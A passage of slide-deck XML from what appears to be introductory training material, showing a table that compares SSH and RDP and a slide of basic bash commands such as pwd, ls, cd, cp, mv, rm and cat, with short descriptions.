                      </a:pPr>
                      <a:r>
                        <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660000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>SSH</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660000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="FFFFFF"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>RDP</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1C7268"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="514350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="1B1E1D"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="1B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>What you get</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F8F3EA"/>
                    </a:solidFill>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A text shell</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A full graphical desktop</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r>
              <a:tr h="514350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="1B1E1D"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="1B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Default port</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F8F3EA"/>
                    </a:solidFill>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22</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3389</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r>
              <a:tr h="514350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="1B1E1D"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="1B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Typical use</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F8F3EA"/>
                    </a:solidFill>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Servers, network gear, competition boxes</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Workstations, remote office desktops</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r>
              <a:tr h="514350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="1B1E1D"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="1B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Bandwidth</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F8F3EA"/>
                    </a:solidFill>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Very light</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Heavier, sends screen images</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r>
              <a:tr h="514350">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="1B1E1D"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="1B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Native to</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solidFill>
                      <a:srgbClr val="F8F3EA"/>
                    </a:solidFill>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Linux/Unix (works everywhere via a client)</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="1B1E1D"/>
                        </a:buClr>
                        <a:buSzPts val="900"/>
                        <a:buFont typeface="Calibri"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="900" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="1B1E1D"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Windows (built in)</a:t>
                      </a:r>
                      <a:endParaRPr sz="900" u="none" cap="none" strike="noStrike">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="34300" marB="34300" marR="68600" marL="68600" anchor="ctr">
                    <a:lnL cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E6E1D6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E6E1D6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E6E1D6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="E6E1D6"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p26"/>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SSH vs RDP</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369;p26"/>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74" name="Shape 374"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Google Shape;375;p27"/>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YOUR FIRST COMMANDS</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Google Shape;376;p27"/>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Basic bash navigation</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Google Shape;377;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="140589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8" name="Google Shape;378;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="152933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9" name="Google Shape;379;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="152933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pwd</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380" name="Google Shape;380;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="189966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Print working directory: where am I right now?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Google Shape;381;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="140589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2" name="Google Shape;382;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="152933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3" name="Google Shape;383;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="152933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ls</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="189966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List what's in the current directory</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="140589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6" name="Google Shape;386;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="152933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7" name="Google Shape;387;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="152933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cd &lt;dir&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google Shape;388;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="189966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Change directory</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="Google Shape;389;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="260604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0" name="Google Shape;390;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="272948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1" name="Google Shape;391;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="272948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mkdir &lt;name&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Google Shape;392;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="309981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Make a new directory</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="260604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4" name="Google Shape;394;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="272948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5" name="Google Shape;395;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="272948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cp &lt;a&gt; &lt;b&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="309981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Copy a file</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397" name="Google Shape;397;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="260604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8" name="Google Shape;398;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="272948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99" name="Google Shape;399;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="272948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mv &lt;a&gt; &lt;b&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="309981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Move or rename a file</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Google Shape;401;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="380619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2" name="Google Shape;402;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="392963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3" name="Google Shape;403;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="392963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rm &lt;file&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Google Shape;404;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="429996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Remove a file (no trash can, be careful)</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="405" name="Google Shape;405;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="380619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6" name="Google Shape;406;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="392963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7" name="Google Shape;407;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="392963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cat &lt;file&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Google Shape;408;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="429996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Print a file's contents to the screen</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3806190"/>
            <a:ext cx="264033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0" name="Google Shape;410;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3929634"/>
            <a:ext cx="2366010" cy="308610"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 13333" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1E1D"/>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1" name="Google Shape;411;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3929634"/>
            <a:ext cx="236601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4AD4C4"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Courier New"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4AD4C4"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>man &lt;command&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Google Shape;412;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="4299966"/>
            <a:ext cx="2366010" cy="4800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Read the manual for any command</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p27"/>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Bash navigation</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;p27"/>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9" name="Shape 419"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Google Shape;420;p28"/>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BEYOND CD AND LS</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;p28"/>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Useful shell tools worth knowing</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
